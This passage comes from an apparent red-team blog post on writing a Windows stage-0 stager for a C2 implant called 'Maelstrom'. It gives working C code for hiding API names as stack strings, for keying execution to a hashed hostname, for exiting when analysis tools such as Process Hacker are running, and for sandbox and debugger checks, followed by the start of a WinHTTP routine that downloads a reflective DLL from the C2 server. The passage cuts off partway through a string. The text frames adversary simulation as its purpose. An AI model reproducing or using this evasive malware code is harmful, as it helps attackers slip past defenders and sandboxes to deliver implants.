LPVOID Sleep;
LPVOID WinHttpCloseHandle;
LPVOID WinHttpQueryDataAvailable;
LPVOID WinHttpQueryHeaders;
LPVOID WinHttpReadData;
LPVOID WinHttpReceiveResponse;
LPVOID WinHttpSendRequest;
LPVOID WinHttpSetOption;
LPVOID WinHttpConnect;
LPVOID WinHttpOpen;
LPVOID WinHttpOpenRequest;
LPVOID WinHttpAddRequestHeaders;
LPVOID GlobalFree;
LPVOID malloc;
LPVOID free;
LPVOID memset;
LPVOID VirtualProtect;
LPVOID VirtualAlloc;
LPVOID CreateThread;
LPVOID WaitForSingleObject;
LPVOID VirtualFree;
}
API, * PAPI;
In the case of LoadLibraryA:
typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR lpLibFileName);
CHAR cLoadLibraryA[13] = { 'L', 'o', 'a', 'd','L','i','b','r','a','r','y','A',0 };
Api->LoadLibraryA = GetSymbolAddress(hKernel32, cLoadLibraryA);
Then using it:
CHAR cWinHTTP[8] = { 'w','i','n','h','t','t','p',0 };
HMODULE hWinHttp = ((LOADLIBRARYA)api.LoadLibraryA)(cWinHTTP);
Now onto the stager!
A quick recap of stage 0: some initial enumeration and checks are performed on a host before the implant is run. In an adversary simulation exercise, this keeps the operators within scope. It also ensures that the implant only executes when it is safe to do so.
Additionally, this entry point will be entirely position independent, meaning all of the code lives within the .text section. The opcodes can then be extracted and used as shellcode with other execution methods.
Note that position independent code will not be discussed at length in this post; for more detail, we recommend reading Executing Position Independent Shellcode from Object Files in Memory.

Functionality

In this section, we discuss some functionality that can be added to a stage 0. Not all of it needs to go in; these are simply things we found interesting or useful.
Environmental Keying
First up: environmental keying, or guardrailing. This serves two purposes:
  • If the environmental information embedded in the stager does not match what is enumerated on the host, return.
  • Encrypt the stage 1 DLL with some information obtained from the environment, and decrypt it at runtime.
The second point can be fully automated. Maelstrom does not do this, but it is easy to send some information back to the C2. The C2 then encrypts the DLL with that information before returning it to the stager.
There are many ways of doing this, and it largely comes down to creativity.
A simple method is to use something like GetComputerNameW or GetUserNameW. This is fairly basic, and a combination of these calls could be used.
In the case of Maelstrom, we simply hash the computer name and compare it against a stored hash with this function:
BOOL IsCorrectEnvironment(API api) {
WCHAR wHostname[MAX_COMPUTERNAME_LENGTH + 1];
DWORD dwSz = MAX_COMPUTERNAME_LENGTH + 1; // GetComputerNameW expects the size in characters, not bytes
if (((GETCOMPUTERNAMEW)api.GetComputerNameW)(wHostname, &dwSz)) {
if (Djb2HashW(wHostname) == HOSTNAME_HASH) {
return TRUE;
}
}
return FALSE;
}
Which is called like so:
if (IsCorrectEnvironment(Api) == FALSE) {
return FALSE;
}
Encrypting a payload with AES-256 using this technique is covered in Greta: Windows Crypto, and Recursive Keying. Maelstrom does not make use of this, as it is purely a proof of concept.
So, back to the keying. If the computer name doesn't match, the function returns FALSE and the stager exits. Otherwise, execution moves on.
Detecting Suspicious Processes
This one adds an extra layer of friction for blue teams. It is quite simple: if a particular process is found, exit. The following example checks for only one process, but it is straightforward to loop over a list of them:
BOOL AreSuspiciousProcessesRunning(API Api) {
HANDLE hSnapshot;
PROCESSENTRY32W pe32;
BOOL bFound = FALSE;
hSnapshot = ((CREATETOOLHELP32SNAPSHOT)Api.CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return FALSE;
}
pe32.dwSize = sizeof(PROCESSENTRY32W);
if (((PROCESS32FIRSTW)Api.Process32FirstW)(hSnapshot, &pe32)) {
do {
if (Djb2HashW(pe32.szExeFile) == PROCESS_HACKER_HASH) {
bFound = TRUE;
break;
}
} while (((PROCESS32NEXTW)Api.Process32NextW)(hSnapshot, &pe32));
}
// Close the snapshot on every path so the handle is not leaked
((CLOSEHANDLE)Api.CloseHandle)(hSnapshot);
return bFound;
}
This loops over all running processes and returns TRUE if the hash of any executable name matches the defined value. In this case, the hash corresponds to Process Hacker's executable:
#define PROCESS_HACKER_HASH 0xda24bd3c
This is executed like so:
if (AreSuspiciousProcessesRunning(Api)) {
return FALSE;
}
Anti-Sandbox
Sandboxes are a great way to automatically identify the purpose of malware. Essentially, they run a sample inside an isolated virtual machine, watch its behaviour, and report on it.
These are commonly small virtual machines that can only observe a sample for a limited time. Some common ways of handling sandboxes:
  • Waiting for the expiration time (usually 180 seconds)
  • Only executing if not in a virtual machine
  • Only executing if a disk size is above a certain threshold
These are just a few to consider. In the case of Maelstrom, we simply check that the host has more than 4 GB of physical RAM:
BOOL IsInSandbox(API Api) {
MEMORYSTATUSEX memStatus;
memStatus.dwLength = sizeof(memStatus);
((GLOBALMEMORYSTATUSEX)Api.GlobalMemoryStatusEx)(&memStatus);
float fSz = (float)memStatus.ullTotalPhys / (1024 * 1024 * 1024);
if (fSz > 4) {
return FALSE;
}
return TRUE;
}
If this function returns FALSE, execution continues; otherwise the stager exits.
This can be combined with a sleep, in line with the first point above:
void InternalSleep(API Api, DWORD DwSleep) {
((SLEEP)Api.Sleep)(DwSleep);
}
Anti-Debug
Anti-debugging, again, comes down to creativity. Repositories such as LordNoteworthy/al-khaser contain many examples, but Maelstrom keeps it simple:
BOOL IsBeingDebugged() {
PPEB pPeb = (PPEB)PPEB_PTR;
if (pPeb->BeingDebugged == 1) {
return TRUE;
}
else {
return FALSE;
}
}
Read the PEB and check whether BeingDebugged is set to 1. Simple. The anti-debug section of al-khaser lists many more methods, which can be implemented as and when needed.
These techniques are useful for hindering blue teams if the payload is recovered. They slow down identification of the malware's purpose and of the server it talks to. However, they should not be the only protection. For example, if the stager is debugged and the server's IP addresses are found, server-side protections should still control which implants are allowed to communicate with the server.
Downloading the Reflective DLL
For this, we will use WinHTTP, as example code for it is readily accessible; WinInet is the main alternative. For readability, the following struct is defined:
typedef struct DLL_ {
LPVOID Buffer;
DWORD Size;
}
DLL, * PDLL;
And then passed into the function:
BOOL GetReflectiveDLL(API api, PDLL Dll)
We'll get to that shortly. First, the request configuration is defined:
WCHAR wVerb[4] = {
'G', 'E', 'T', 0
};
WCHAR wEndpoint[9] = {
'/', 'a', '?', 's', 't', 'a', 'g', 'e', 0
};
WCHAR wUserAgent[10] = {
'M', 'a', 'e', 'l', 's', 't'